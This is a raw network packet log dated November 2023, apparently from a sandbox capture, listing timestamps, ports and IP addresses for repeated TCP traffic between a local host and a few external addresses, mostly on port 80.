Nov 18, 2023 10:02:34.721488953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721498013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721506119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721523046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721539021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721539021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721555948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721555948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721571922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721589088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721595049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721606016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721631050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721636057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721648932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721661091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721667051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721683979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721700907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721707106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721719027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721728086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721735001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721750975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721766949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721772909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721784115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721801043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721806049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721817017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721833944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721849918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721853971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721868038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721884966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721890926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721901894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721908092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721918106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721934080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721942902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721944094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721952915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721972942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721987009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721990108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722006083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722022057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722038984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722049952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722055912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722069025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722073078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722090960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722090960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722106934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722124100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722125053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722141027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722157955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722162008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722176075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722181082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722193956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722209930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722225904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722244024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722253084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722253084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722259998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722276926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722290039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722291946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722307920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722325087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722342014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722342014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722361088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722377062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722381115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722393990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722404957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722410917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722428083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722428083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722448111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722465038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722465992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722481012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722497940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722501040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722543001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722549915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722574949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722592115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722596884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722608089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722624063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722640991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722645998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722657919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722673893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722677946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722691059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722695112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722708941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722714901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722726107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722742081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722758055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722774982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722776890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722790956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722806931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722822905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722829103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722840071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722856998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722863913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722872972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722884893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722888947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722913027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722918987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722929955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722946882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722954988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722964048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722980022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.722990036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.722995996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.723010063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.723014116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.723030090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.723052979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.723072052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.723490000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.746563911 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.748570919 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.748595953 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.967756987 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:35.017385006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017421007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017437935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017455101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017472982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017492056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017508030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017524004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017540932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017558098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017575979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017627954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017647982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017666101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.017683983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018100023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018197060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018217087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018290997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018312931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018345118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018364906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018382072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018399000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018415928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018433094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018465042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018485069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018548965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018567085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018584967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018601894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018618107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018634081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018651009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018667936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018685102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018702030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018718958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018735886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018753052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018769979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018788099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018805027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018821955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018920898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018939972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018955946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018973112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.018987894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019004107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019020081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019037962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019054890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019072056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019088030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019104004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019119978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019135952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019153118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019169092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019188881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019207001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.019224882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021106958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021162033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021194935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021213055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021230936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021256924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021274090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021291971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021308899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021325111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021342039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021359921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021375895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021394968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021439075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021456003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021480083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021528006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021543980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021559954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021575928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021593094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021610022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021626949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021641970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021697044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021713018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021729946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021745920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021780968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021810055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021827936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021842957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021859884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021877050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021893024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021908998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021951914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021976948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.021995068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022012949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022030115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022047043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022063971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022080898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022097111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022114038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022130013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022146940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022164106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022178888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022197962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022213936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022232056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022248030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022264004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022279978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022296906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022311926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022330046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022346020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022363901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022382021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022398949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022414923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022432089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022449017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022466898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022484064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022501945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022519112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022536039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022552013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022568941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022584915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022600889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022618055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022634029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022650003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022665977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022684097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022702932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022720098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022737980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022754908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022773981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022790909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022806883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022823095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022839069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022855997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022871971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022888899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022905111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022921085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022937059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022953033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022969961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.022985935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023001909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023017883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023036003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023051023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023067951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023083925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023099899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023118973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023134947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023152113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023169041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023185968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023202896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023219109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023235083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023252010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023268938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023284912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023302078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023318052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023344040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023361921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023380041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023397923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023413897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023432016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023448944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023466110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023484945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023499012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023514986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023530960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023547888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023565054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023581028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023597956 CET	80	49744	194.49.94.120	192.168.2.4
